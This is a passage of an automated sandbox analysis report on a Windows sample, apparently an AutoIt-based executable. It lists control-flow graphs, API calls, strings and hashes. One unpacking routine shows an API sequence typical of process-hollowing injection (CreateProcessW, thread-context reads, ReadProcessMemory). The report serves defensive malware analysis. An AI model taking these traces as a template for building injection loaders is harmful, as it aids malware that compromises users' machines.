aa44cb call aa43db 810->816 811->780 816->774
                                APIs
                                • DefWindowProcW.USER32(?,?,?,?), ref: 00AA36D2
                                • KillTimer.USER32(?,00000001), ref: 00AA36FC
                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA371F
                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA372A
                                • CreatePopupMenu.USER32 ref: 00AA373E
                                • PostQuitMessage.USER32(00000000), ref: 00AA375F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                • String ID: TaskbarCreated
                                • API String ID: 129472671-2362178303
                                • Opcode ID: 5021a2812d3435ecfcfaf02742beac7fdeee13b2b4cf5589d70b8d0cbbc79919
                                • Instruction ID: 582e17d308ac7b64122e3ca66aa4b6abfa5f7f936b4b5b9c0c4947f685d95ee7
                                • Opcode Fuzzy Hash: 5021a2812d3435ecfcfaf02742beac7fdeee13b2b4cf5589d70b8d0cbbc79919
                                • Instruction Fuzzy Hash: 1341C9B32041057BDF259F78DD49B7A37A9EB06300F14022AF602972F1DFA89D5597A1

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                • API String ID: 1825951767-3513169116
                                • Opcode ID: 9f3c3fc106ba70591047644d65dc2de854ac7949dfa3bd620b85840b3bc85a53
                                • Instruction ID: abe5db30f030406a2c8a0a0a8c40bfcfae6bd9938d28bdd16681989188865b4e
                                • Opcode Fuzzy Hash: 9f3c3fc106ba70591047644d65dc2de854ac7949dfa3bd620b85840b3bc85a53
                                • Instruction Fuzzy Hash: 42A15372D10229AACF14EFA0DD95EEEB7B8BF16300F14052AF416671D1EF749A05CB60

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 942 a425f0-a4269e call a40000 945 a426a5-a426cb call a43500 CreateFileW 942->945 948 a426d2-a426e2 945->948 949 a426cd 945->949 956 a426e4 948->956 957 a426e9-a42703 VirtualAlloc 948->957 950 a4281d-a42821 949->950 952 a42863-a42866 950->952 953 a42823-a42827 950->953 958 a42869-a42870 952->958 954 a42833-a42837 953->954 955 a42829-a4282c 953->955 959 a42847-a4284b 954->959 960 a42839-a42843 954->960 955->954 956->950 961 a42705 957->961 962 a4270a-a42721 ReadFile 957->962 963 a428c5-a428da 958->963 964 a42872-a4287d 958->964 967 a4284d-a42857 959->967 968 a4285b 959->968 960->959 961->950 969 a42723 962->969 970 a42728-a42768 VirtualAlloc 962->970 965 a428dc-a428e7 VirtualFree 963->965 966 a428ea-a428f2 963->966 971 a42881-a4288d 964->971 972 a4287f 964->972 965->966 967->968 968->952 969->950 973 a4276f-a4278a call a43750 970->973 974 a4276a 970->974 975 a428a1-a428ad 971->975 976 a4288f-a4289f 971->976 972->963 982 a42795-a4279f 973->982 974->950 978 a428af-a428b8 975->978 979 a428ba-a428c0 975->979 977 a428c3 976->977 977->958 978->977 979->977 983 a427a1-a427d0 call a43750 982->983 984 a427d2-a427e6 call a43560 982->984 983->982 990 a427e8 984->990 991 a427ea-a427ee 984->991 990->950 992 a427f0-a427f4 FindCloseChangeNotification 991->992 993 a427fa-a427fe 991->993 992->993 994 a42800-a4280b VirtualFree 993->994 995 a4280e-a42817 993->995 994->995 995->945 995->950
                                APIs
                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00A426C1
                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A428E7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CreateFileFreeVirtual
                                • String ID:
                                • API String ID: 204039940-0
                                • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                • Instruction ID: 1d9a23eb879d3c95e4e58a3c0c699bcc4f837b9108b58169ea66371a77bc5b2f
                                • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                • Instruction Fuzzy Hash: 07A11878E00209EBDB14CFA4C994BEEBBB5FF88304F608559E501BB280D7759A41DFA4

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1073 aa39e7-aa3a57 CreateWindowExW * 2 ShowWindow * 2
                                APIs
                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA3A15
                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA3A36
                                • ShowWindow.USER32(00000000,?,?), ref: 00AA3A4A
                                • ShowWindow.USER32(00000000,?,?), ref: 00AA3A53
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Window$CreateShow
                                • String ID: AutoIt v3$edit
                                • API String ID: 1584632944-3779509399
                                • Opcode ID: 38a2779fc9facf811222d8a466055cddd943bbdb829f74f75e51f9ab5fb4c9a7
                                • Instruction ID: ba2acb8a6f4d5a414125cba327d8a091c992b819d6fa637533be6a01fa7c93a4
                                • Opcode Fuzzy Hash: 38a2779fc9facf811222d8a466055cddd943bbdb829f74f75e51f9ab5fb4c9a7
                                • Instruction Fuzzy Hash: 61F0DA716412907EEB311B276C59E772F7DD7C6F50B00413AF904E31B0CAE91851DAB0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1074 a423b0-a424e9 call a40000 call a422a0 CreateFileW 1081 a424f0-a42500 1074->1081 1082 a424eb 1074->1082 1085 a42507-a42521 VirtualAlloc 1081->1085 1086 a42502 1081->1086 1083 a425a0-a425a5 1082->1083 1087 a42525-a4253c ReadFile 1085->1087 1088 a42523 1085->1088 1086->1083 1089 a42540-a4257a call a422e0 call a412a0 1087->1089 1090 a4253e 1087->1090 1088->1083 1095 a42596-a4259e ExitProcess 1089->1095 1096 a4257c-a42591 call a42330 1089->1096 1090->1083 1095->1083 1096->1095
                                APIs
                                  • Part of subcall function 00A422A0: Sleep.KERNELBASE(000001F4), ref: 00A422B1
                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A424DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CreateFileSleep
                                • String ID: VAYJBYJVLNAMY1E
                                • API String ID: 2694422964-4178516806
                                • Opcode ID: fd0f24fe7ef676856aba473c2ad4fc0d82a15cb00b1cf0a5a8e00028a04edd42
                                • Instruction ID: f9248abc61f2a5327be925570240d291fada86a1be6f942ec28b1e1a421055b4
                                • Opcode Fuzzy Hash: fd0f24fe7ef676856aba473c2ad4fc0d82a15cb00b1cf0a5a8e00028a04edd42
                                • Instruction Fuzzy Hash: 9B519174D14249EBEF10DBE4C855BEEBB79AF58300F004199E608BB2C1D7B91B44CB66

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1098 aa410d-aa4123 1099 aa4129-aa413e call aa7b76 1098->1099 1100 aa4200-aa4204 1098->1100 1103 add5dd-add5ec LoadStringW 1099->1103 1104 aa4144-aa4164 call aa7d2c 1099->1104 1106 add5f7-add60f call aa7c8e call aa7143 1103->1106 1104->1106 1108 aa416a-aa416e 1104->1108 1116 aa417e-aa41fb call ac3020 call aa463e call ac2ffc Shell_NotifyIconW call aa5a64 1106->1116 1120 add615-add633 call aa7e0b call aa7143 call aa7e0b 1106->1120 1110 aa4174-aa4179 call aa7c8e 1108->1110 1111 aa4205-aa420e call aa81a7 1108->1111 1110->1116 1111->1116 1116->1100 1120->1116
                                APIs
                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00ADD5EC
                                  • Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66
                                • _memset.LIBCMT ref: 00AA418D
                                • _wcscpy.LIBCMT ref: 00AA41E1
                                • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AA41F1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                • String ID: Line:
                                • API String ID: 3942752672-1585850449
                                • Opcode ID: ecbe7da5e25fabc3100dae728d6a603dc8afdbe05b06c7873db5d3cbe8719b5d
                                • Instruction ID: 5065e8b588dd7e17318b7f52e50d0953f49fcf2dac99d43dd6365ba8dd4b6fed
                                • Opcode Fuzzy Hash: ecbe7da5e25fabc3100dae728d6a603dc8afdbe05b06c7873db5d3cbe8719b5d
                                • Instruction Fuzzy Hash: 3931B171408314AAD761EB60DD56FEF77E8AF86300F10461EF185931E1EFB4AA49CB92

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1133 ac564d-ac5666 1134 ac5668-ac566d 1133->1134 1135 ac5683 1133->1135 1134->1135 1136 ac566f-ac5671 1134->1136 1137 ac5685-ac568b 1135->1137 1138 ac568c-ac5691 1136->1138 1139 ac5673-ac5678 call ac8d68 1136->1139 1141 ac569f-ac56a3 1138->1141 1142 ac5693-ac569d 1138->1142 1150 ac567e call ac8ff6 1139->1150 1145 ac56a5-ac56b0 call ac3020 1141->1145 1146 ac56b3-ac56b5 1141->1146 1142->1141 1144 ac56c3-ac56d2 1142->1144 1148 ac56d9 1144->1148 1149 ac56d4-ac56d7 1144->1149 1145->1146 1146->1139 1147 ac56b7-ac56c1 1146->1147 1147->1139 1147->1144 1152 ac56de-ac56e3 1148->1152 1149->1152 1150->1135 1155 ac57cc-ac57cf 1152->1155 1156 ac56e9-ac56f0 1152->1156 1155->1137 1157 ac5731-ac5733 1156->1157 1158 ac56f2-ac56fa 1156->1158 1160 ac579d-ac579e call ad0df7 1157->1160 1161 ac5735-ac5737 1157->1161 1158->1157 1159 ac56fc 1158->1159 1165 ac57fa 1159->1165 1166 ac5702-ac5704 1159->1166 1167 ac57a3-ac57a7 1160->1167 1163 ac5739-ac5741 1161->1163 1164 ac575b-ac5766 1161->1164 1168 ac5751-ac5755 1163->1168 1169 ac5743-ac574f 1163->1169 1170 ac5768 1164->1170 1171 ac576a-ac576d 1164->1171 1174 ac57fe-ac5807 1165->1174 1172 ac570b-ac5710 1166->1172 1173 ac5706-ac5708 1166->1173 1167->1174 1175 ac57a9-ac57ae 1167->1175 1176 ac5757-ac5759 1168->1176 1169->1176 1170->1171 1177 ac576f-ac577b call ac4916 call ad10ab 1171->1177 1178 ac57d4-ac57d8 1171->1178 1172->1178 1179 ac5716-ac572f call ad0f18 1172->1179 1173->1172 1174->1137 1175->1178 1180 ac57b0-ac57c1 1175->1180 1176->1171 1194 ac5780-ac5785 1177->1194 1181 ac57ea-ac57f5 call ac8d68 1178->1181 1182 ac57da-ac57e7 call ac3020 1178->1182 1193 ac5792-ac579b 1179->1193 1185 ac57c4-ac57c6 1180->1185 1181->1150 1182->1181 1185->1155 1185->1156 1193->1185 1195 ac580c-ac5810 1194->1195 1196 ac578b-ac578e 1194->1196 1195->1174 1196->1165 1197 ac5790 1196->1197 1197->1193
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                • String ID:
                                • API String ID: 1559183368-0
                                • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                • Instruction ID: 1caf93493896d42506fef4f31b7d277f9b6f3a8a744a3222f08f3f4eb85f24bf
                                • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                • Instruction Fuzzy Hash: C7517F34E00B05DBDB249FB98984F6E77B5AF50320F6A8B2DF825962D0D770ADD08B40
                                APIs
                                  • Part of subcall function 00AA4F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B662F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4F6F
                                • _free.LIBCMT ref: 00ADE68C
                                • _free.LIBCMT ref: 00ADE6D3
                                  • Part of subcall function 00AA6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AA6D0D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _free$CurrentDirectoryLibraryLoad
                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                • API String ID: 2861923089-1757145024
                                • Opcode ID: 7408b06788bccd304c3f702a51e4e359c73bfc03e3d3a646852518374bb01bd0
                                • Instruction ID: a7cc3429a46866c9b02f239629199c5e11f98cc6e69b34ed0f5a39d4142ccd70
                                • Opcode Fuzzy Hash: 7408b06788bccd304c3f702a51e4e359c73bfc03e3d3a646852518374bb01bd0
                                • Instruction Fuzzy Hash: 88915F71910219AFCF04EFA4CD919EDB7B4FF19314F14446AF816AB2A1EB31A905CB50
                                APIs
                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00AA35A1,SwapMouseButtons,00000004,?), ref: 00AA35D4
                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00AA35A1,SwapMouseButtons,00000004,?,?,?,?,00AA2754), ref: 00AA35F5
                                • RegCloseKey.KERNELBASE(00000000,?,?,00AA35A1,SwapMouseButtons,00000004,?,?,?,?,00AA2754), ref: 00AA3617
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: Control Panel\Mouse
                                • API String ID: 3677997916-824357125
                                • Opcode ID: 0d836b3e5720a248e58517fabb3775798383c73ae8aa3e588ba54357ca5b61fb
                                • Instruction ID: f7bc62d99f9b1764b556e32e79f1748c06495f3f2d769e66a2a633546fbcc676
                                • Opcode Fuzzy Hash: 0d836b3e5720a248e58517fabb3775798383c73ae8aa3e588ba54357ca5b61fb
                                • Instruction Fuzzy Hash: 00113672910208BADF208FA4D840DABB7B8EF05740F00846AB805D7250E7719E419B60
                                APIs
                                • CreateProcessW.KERNELBASE(?,00000000), ref: 00A41ACD
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A41AF1
                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A41B13
                                • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 00A41E1C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681768702.0000000000A40000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_a40000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                • String ID:
                                • API String ID: 572931308-0
                                • Opcode ID: a08d661af1579fd21ac3dcfb20f4bf99dc511b72db546338f3390fc10d84f6f3
                                • Instruction ID: 8498f239f9259bdaa24ff07c18355bba004c94096e63d449bc51c86e9435871d
                                • Opcode Fuzzy Hash: a08d661af1579fd21ac3dcfb20f4bf99dc511b72db546338f3390fc10d84f6f3
                                • Instruction Fuzzy Hash: FD621C74A14258DBEB24CFA4C851BEEB372EF98300F1091A9D10DEB394E7759E81CB59
                                APIs
                                  • Part of subcall function 00AA5045: _fseek.LIBCMT ref: 00AA505D
                                  • Part of subcall function 00B099BE: _wcscmp.LIBCMT ref: 00B09AAE
                                  • Part of subcall function 00B099BE: _wcscmp.LIBCMT ref: 00B09AC1
                                • _free.LIBCMT ref: 00B0992C
                                • _free.LIBCMT ref: 00B09933
                                • _free.LIBCMT ref: 00B0999E
                                  • Part of subcall function 00AC2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9C64), ref: 00AC2FA9
                                  • Part of subcall function 00AC2F95: GetLastError.KERNEL32(00000000,?,00AC9C64), ref: 00AC2FBB
                                • _free.LIBCMT ref: 00B099A6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                • String ID:
                                • API String ID: 1552873950-0
                                • Opcode ID: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                • Instruction ID: a640e2d2e032e3d5527e32c8a99eb04558b164f19fd22f082e4b73fe4644b56e
                                • Opcode Fuzzy Hash: c040f5d591410a8d3afab51092a26b6f5939c84b98243336257d617f1f09bfd3
                                • Instruction Fuzzy Hash: D5514DB1D04218AFDF249F64DC81B9EBBB9EF48310F1044AEB649A7281DB715E90CF59
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                • String ID:
                                • API String ID: 2782032738-0
                                • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                • Instruction ID: 58a74fe7340d1783ddabf315d15587e4d65b63ad440ce5deeb4f279d2be6efeb
                                • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                • Instruction Fuzzy Hash: 2B41C574A006159BDF28CF69C8A0FAF77B5EF883A0B26813DE85587640D770DD40874C
                                APIs
                                • _memset.LIBCMT ref: 00ADEE62
                                • GetOpenFileNameW.COMDLG32(?), ref: 00ADEEAC
                                  • Part of subcall function 00AA48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA48A1,?,?,00AA37C0,?), ref: 00AA48CE
                                  • Part of subcall function 00AC09D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AC09F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd
                                Similarity
                                • API ID: Name$Path$FileFullLongOpen_memset
                                • String ID: X
                                • API String ID: 3777226403-3081909835
                                • Opcode ID: 4ba97a852c10cc1d72664f7b0623e16ce24003c929f44f8a23f7656d10e3e8c4
                                • Instruction ID: 759219e6a480fac71b5420eb9f000b692975511428ebcfaf3cd773a6e5cd166d
                                • Opcode Fuzzy Hash: 4ba97a852c10cc1d72664f7b0623e16ce24003c929f44f8a23f7656d10e3e8c4
                                • Instruction Fuzzy Hash: E021C331A002589BCB51DF94CC45BEE7BFC9F49300F00805AE809EB281DFB8598E8FA1
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                • Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
